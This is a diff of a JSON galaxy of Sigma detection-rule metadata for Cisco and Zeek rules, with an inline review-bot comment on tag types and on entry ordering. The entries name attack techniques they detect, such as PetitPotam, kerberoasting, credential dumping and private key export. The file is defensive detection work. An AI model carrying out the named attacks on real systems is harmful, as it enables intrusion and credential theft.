"https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_collect_data.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.collection", + "attack.t1087.001", + "attack.t1552.001", + "attack.t1005" + ] + }, + "uuid": "cd072b25-a418-4f98-8ebc-5093fb38fe1a", + "value": "Cisco Collect Data" + }, + { + "description": "Turn off logging locally or remote", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "cisco_cli_disable_logging.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_disable_logging.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "9e8f6035-88bf-4a63-96b6-b17c0508257e", + "value": "Cisco Disabling Logging" + }, + { + "description": "Detect a system being shutdown or put into different boot mode", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/15", + "falsepositive": [ + "Legitimate administrators may run these commands, though rarely." 
+ ], + "filename": "cisco_cli_dos.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" + ], + "tags": [ + "attack.impact", + "attack.t1495", + "attack.t1529", + "attack.t1565.001" + ] + }, + "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", + "value": "Cisco Denial of Service" + }, + { + "description": "Show when a monitor or a span/rspan is setup or modified", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/11", + "falsepositive": [ + "Admins may setup new or modify old spans, or use a monitor for troubleshooting" + ], + "filename": "cisco_cli_net_sniff.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ] + }, + "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", + "value": "Cisco Sniffing" + }, + { + "description": "Find local accounts being created or modified as well as remote authentication configurations", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "When remote authentication is in place, this should not change often" + ], + "filename": "cisco_cli_local_accounts.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "attack.t1098" + ] + }, + "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", + "value": "Cisco Local Accounts" + }, + { + "description": "Show when private keys are being exported from the device, or when new certificates are installed", + "meta": { 
+ "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Not commonly run by administrators. Also whitelist your known good certificates" + ], + "filename": "cisco_cli_crypto_actions.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml" + ], + "tags": [ + "attack.credential_access", + "attack.defense_evasion", + "attack.t1553.004", + "attack.t1552.004" + ] + }, + "uuid": "1f978c6a-4415-47fb-aca5-736a44d7ca3d", + "value": "Cisco Crypto Commands" + }, + { + "description": "Clear command history in network OS which is used for defense evasion", + "meta": { + "author": "Austin Clark", + "creation_date": "2019/08/12", + "falsepositive": [ + "Legitimate administrators may run these commands" + ], + "filename": "cisco_cli_clear_logs.yml", + "level": "high", + "logsource.category": "accounting", + "logsource.product": "cisco", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_clear_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "ceb407f6-8277-439b-951f-e4210e3ed956", + "value": "Cisco Clear Logs" + }, + { + "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", + "meta": { + "author": "Bhabesh Raj", + "creation_date": "2021/06/23", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_default_cobalt_strike_certificate.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" + ], + "tags": [ + "attack.command_and_control", + 
"attack.s0154" + ] + }, + "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", + "value": "Default Cobalt Strike Certificate" + }, + { + "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", + "meta": { + "author": "Josh Brower @DefensiveDepth", + "creation_date": "2020/08/22", + "falsepositive": [ + "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." + ], + "filename": "zeek_rdp_public_listener.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://attack.mitre.org/techniques/T1021/001/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" + ], + "tags": [ + "attack.t1021.001" + ] + }, + "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", + "value": "Publicly Accessible RDP Service" + }, + { + "description": "Detects kerberos TGS request using RC4 encryption which may be indicative of kerberoasting", + "meta": { + "author": "sigma", + "creation_date": "2020/02/12", + "falsepositive": [ + "Normal enterprise SPN requests activity" + ], + "filename": "zeek_susp_kerberos_rc4.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://adsecurity.org/?p=3458", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_susp_kerberos_rc4.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1558.003" + ] + }, + "uuid": "503fe26e-b5f2-4944-a126-eab405cc06e5", + "value": "Kerberos Network Traffic RC4 Ticket Encryption" + }, + { + "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol 
(MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", + "meta": { + "author": "@neu5ron, @Antonlovesdnb, Mike Remen", + "creation_date": "2021/08/17", + "falsepositive": [ + "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." + ], + "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", + "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", + "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", + "https://threatpost.com/microsoft-petitpotam-poc/168163/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" + ], + "tags": [ + "attack.t1557.001", + "attack.t1187" + ] + }, + "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", + "value": "Potential PetitPotam Attack Via EFS RPC Calls" + }, + { + "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. 
This could be an indicator of exfiltration.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_http_webdav_put_request.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", + "value": "WebDav Put Request" + }, + { + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "meta": { + "author": "Samir Bousseaden, @neu5rn", + "creation_date": "2020/04/03", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_smb_converted_win_atsvc_task.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "car.2013-05-004", + "car.2015-04-001", + "attack.t1053.002" + ] + }, + "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", + "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" + }, + { + "description": "Detects executable access via webdav6. 
Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", + "meta": { + "author": "SOC Prime, Adam Swan", + "creation_date": "2020/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_http_executable_download_from_webdav.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29", - "https://github.com/OTRF/detection-hackathon-apt29/issues/37", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" + "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" ], "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1082" + "attack.command_and_control", + "attack.t1105" ] }, - "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", - "value": "Domain User Enumeration Network Recon 01" + "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", + "value": "Executable from Webdav" + }, + { + "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", + "meta": { + "author": "Saw Winn Naung , Azure-Sentinel", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "zeek_dns_torproxy.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" + ], + "tags": [ + "attack.t1048" + ] + }, + "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", + "value": "DNS TOR Proxies" + }, + { + "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) 
commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", + "meta": { + "author": "Nate Guagenti (neu5ron)", + "creation_date": "2021/09/20", + "falsepositive": [ + "Exploits that were attempted but unsuccessful.", + "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." + ], + "filename": "zeek_http_omigod_no_auth_rce.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "zeek", + "refs": [ + "https://twitter.com/neu5ron/status/1438987292971053057?s=20", + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.lateral_movement", + "attack.t1068", + "attack.t1190", + "attack.t1203", + "attack.t1021.006", + "attack.t1210" + ] + }, + "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", + "value": "OMIGOD HTTP No Authentication RCE" }, { "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", 
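Review bot: The "Cleartext Protocol Usage" entry (uuid d7fb8f0e-…) carries `"tags": "No established tags"`, a string where every other entry in this hunk has an array, so a consumer iterating `tags` will walk the characters of the sentinel or fail on a type check; emit `"tags": []` (or omit the key) instead, and apply the same to any other rule the generator finds without tags. The `logsource.category`/`logsource.product` sentinels at least keep one type per key, though leaving absent values out would make the galaxy easier to query than encoding "No established …" prose. Separately, the hunk header (`-10310,55 +83,915`) shows entries such as "Equation Group C2 Communication" and "Potential PetitPotam Attack Via EFS RPC Calls" relocating from old line ~10310 to new line ~83 with their `refs` arrays in a different order, which suggests the generator walks the rule tree and reference lists non-deterministically; sorting entries by filename or uuid and refs lexically before writing would keep future regenerations reviewable. The removed "Domain User Enumeration Network Recon 01" entry (uuid 66a0bdc6-…) is not re-added anywhere visible in this hunk, so please confirm it reappears elsewhere in the file rather than being silently dropped.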
@@ -10387,372 +1020,6 @@ "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", "value": "MITRE BZAR Indicators for Execution" }, - { - "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", - "meta": { - "author": "@neu5ron, SOC Prime", - "creation_date": "2020/03/19", - "falsepositive": [ - "Windows administrator tasks or troubleshooting", - "Windows management scripts or software" - ], - "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ] - }, - "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", - "value": "MITRE BZAR Indicators for Persistence" - }, - { - "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", - "meta": { - "author": "@neu5ron, @Antonlovesdnb, Mike Remen", - "creation_date": "2021/08/17", - "falsepositive": [ - "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." 
- ], - "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", - "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", - "https://threatpost.com/microsoft-petitpotam-poc/168163/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" - ], - "tags": [ - "attack.t1557.001", - "attack.t1187" - ] - }, - "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", - "value": "Potential PetitPotam Attack Via EFS RPC Calls" - }, - { - "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", - "meta": { - "author": "@neu5ron (Nate Guagenti)", - "creation_date": "2021/08/23", - "falsepositive": [ - "Legitimate remote alteration of a printer driver." 
- ], - "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://github.com/corelight/CVE-2021-1675", - "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" - ], - "tags": [ - "attack.execution", - "cve.2021.1678", - "cve.2021.1675", - "cve.2021.34527" - ] - }, - "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", - "value": "Possible PrintNightmare Print Driver Install" - }, - { - "description": "Detects the use of the spoolss named pipe over SMB. 
This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "meta": { - "author": "OTR (Open Threat Research), @neu5ron", - "creation_date": "2018/11/28", - "falsepositive": [ - "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" - ], - "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", - "https://twitter.com/_dirkjan/status/1309214379003588608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", - "value": "SMB Spoolss Name Piped Usage" - }, - { - "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/06/23", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_default_cobalt_strike_certificate.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.s0154" - ] - }, - "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", - "value": "Default Cobalt Strike Certificate" - }, - { - "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", - "meta": { - "author": 
"Saw Winn Naung, Azure-Sentinel, @neu5ron", - "creation_date": "2021/08/19", - "falsepositive": [ - "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." - ], - "filename": "zeek_dns_mining_pools.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" - ], - "tags": [ - "attack.t1569.002", - "attack.t1496" - ] - }, - "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", - "value": "DNS Events Related To Mining Pools" - }, - { - "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. 
This rule looks for a DNS request to the ma>", - "meta": { - "author": "Michael Portera (@mportatoes)", - "creation_date": "2022/04/21", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_dns_nkn.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/nknorg/nkn-sdk-go", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", - "https://github.com/Maka8ka/NGLite", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" - ], - "tags": [ - "attack.command_and_control" - ] - }, - "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", - "value": "New Kind of Network (NKN) Detection" - }, - { - "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", - "meta": { - "author": "@neu5ron, SOC Prime Team, Corelight", - "creation_date": "2021/05/04", - "falsepositive": [ - "Internal or legitimate external domains using DNSSec. 
Verify if these are legitimate DNSSec domains and then exclude them.", - "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" - ], - "filename": "zeek_dns_susp_zbit_flag.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://twitter.com/neu5ron/status/1346245602502443009", - "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", - "https://tools.ietf.org/html/rfc2929#section-2.1", - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" - ], - "tags": [ - "attack.t1095", - "attack.t1571", - "attack.command_and_control" - ] - }, - "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", - "value": "Suspicious DNS Z Flag Bit Set" - }, - { - "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", - "meta": { - "author": "Saw Winn Naung , Azure-Sentinel", - "creation_date": "2021/08/15", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_dns_torproxy.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" - ], - "tags": [ - "attack.t1048" - ] - }, - "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", - "value": "DNS TOR Proxies" - }, - { - "description": "Detects executable access via webdav6. 
Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", - "meta": { - "author": "SOC Prime, Adam Swan", - "creation_date": "2020/05/01", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_http_executable_download_from_webdav.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", - "https://github.com/OTRF/detection-hackathon-apt29", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ] - }, - "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", - "value": "Executable from Webdav" - }, - { - "description": "Detects the exploitation of OMIGOD (CVE-2021-38647) which allows remote execute (RCE) commands as root with just a single unauthenticated HTTP request.\nVerify, successful, exploitation by viewing the HTTP client (request) body to see what was passed to the server (using PCAP).\nWithin the client body is where the code execution would occur. Additionally, check the endpoint logs to see if suspicious commands or activity occurred within the timeframe of this HTTP request.\n", - "meta": { - "author": "Nate Guagenti (neu5ron)", - "creation_date": "2021/09/20", - "falsepositive": [ - "Exploits that were attempted but unsuccessful.", - "Scanning attempts with the abnormal use of the HTTP POST method with no indication of code execution within the HTTP Client (Request) body. An example would be vulnerability scanners trying to identify unpatched versions while not actually exploiting the vulnerability. See description for investigation tips." 
- ], - "filename": "zeek_http_omigod_no_auth_rce.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", - "https://twitter.com/neu5ron/status/1438987292971053057?s=20", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_omigod_no_auth_rce.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.initial_access", - "attack.execution", - "attack.lateral_movement", - "attack.t1068", - "attack.t1190", - "attack.t1203", - "attack.t1021.006", - "attack.t1210" - ] - }, - "uuid": "ab6b1a39-a9ee-4ab4-b075-e83acf6e346b", - "value": "OMIGOD HTTP No Authentication RCE" - }, - { - "description": "A General detection for WebDav user-agent being used to PUT files on a WebDav network share. This could be an indicator of exfiltration.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_http_webdav_put_request.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/17", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_webdav_put_request.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "705072a5-bb6f-4ced-95b6-ecfa6602090b", - "value": "WebDav Put Request" - }, - { - "description": "Detects connections from routable IPs to an RDP listener - which is indicative of a publicly-accessible RDP service.", - "meta": { - "author": "Josh Brower @DefensiveDepth", - "creation_date": "2020/08/22", - "falsepositive": [ - "Although it is recommended to NOT have RDP exposed to the internet, verify that this is a) allowed b) the server has not already been compromised via some brute force or remote exploit since it has 
been exposed to the internet. Work to secure the server if you are unable to remove it from being exposed to the internet." - ], - "filename": "zeek_rdp_public_listener.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://attack.mitre.org/techniques/T1021/001/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_rdp_public_listener.yml" - ], - "tags": [ - "attack.t1021.001" - ] - }, - "uuid": "1fc0809e-06bf-4de3-ad52-25e5263b7623", - "value": "Publicly Accessible RDP Service" - }, - { - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "meta": { - "author": "Samir Bousseaden, @neu5rn", - "creation_date": "2020/04/03", - "falsepositive": [ - "Unknown" - ], - "filename": "zeek_smb_converted_win_atsvc_task.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_atsvc_task.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_atsvc_task.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" - ] - }, - "uuid": "dde85b37-40cd-4a94-b00c-0b8794f956b5", - "value": "Remote Task Creation via ATSVC Named Pipe - Zeek" - }, { "description": "Detect AD credential dumping using impacket secretdump HKTL. Based on the SIGMA rules/windows/builtin/win_impacket_secretdump.yml", "meta": { 
@@ -10779,30 +1046,6 @@ "uuid": "92dae1ed-1c9d-4eff-a567-33acbd95b00e", "value": "Possible Impacket SecretDump Remote Activity - Zeek" }, - { - "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", - "meta": { - "author": "Samir Bousseaden, @neu5ron, Tim Shelton", - "creation_date": "2020/04/02", - "falsepositive": [ - "Update the excluded named pipe to filter out any newly observed legit named pipe" - ], - "filename": "zeek_smb_converted_win_lm_namedpipe.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "zeek", - "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_lm_namedpipe.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_lm_namedpipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "021310d9-30a6-480a-84b7-eaa69aeb92bb", - "value": "First Time Seen Remote Named Pipe - Zeek" - }, { "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", "meta": { @@ -10816,7 +1059,7 @@ "logsource.category": "No established category", "logsource.product": "zeek", "refs": [ - "https://github.com/neo23x0/sigma/blob/d42e87edd741dd646db946f30964f331f92f50e6/rules/windows/builtin/win_susp_psexec.yml", + "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_smb_converted_win_susp_psexec.yml" ], "tags": [ 
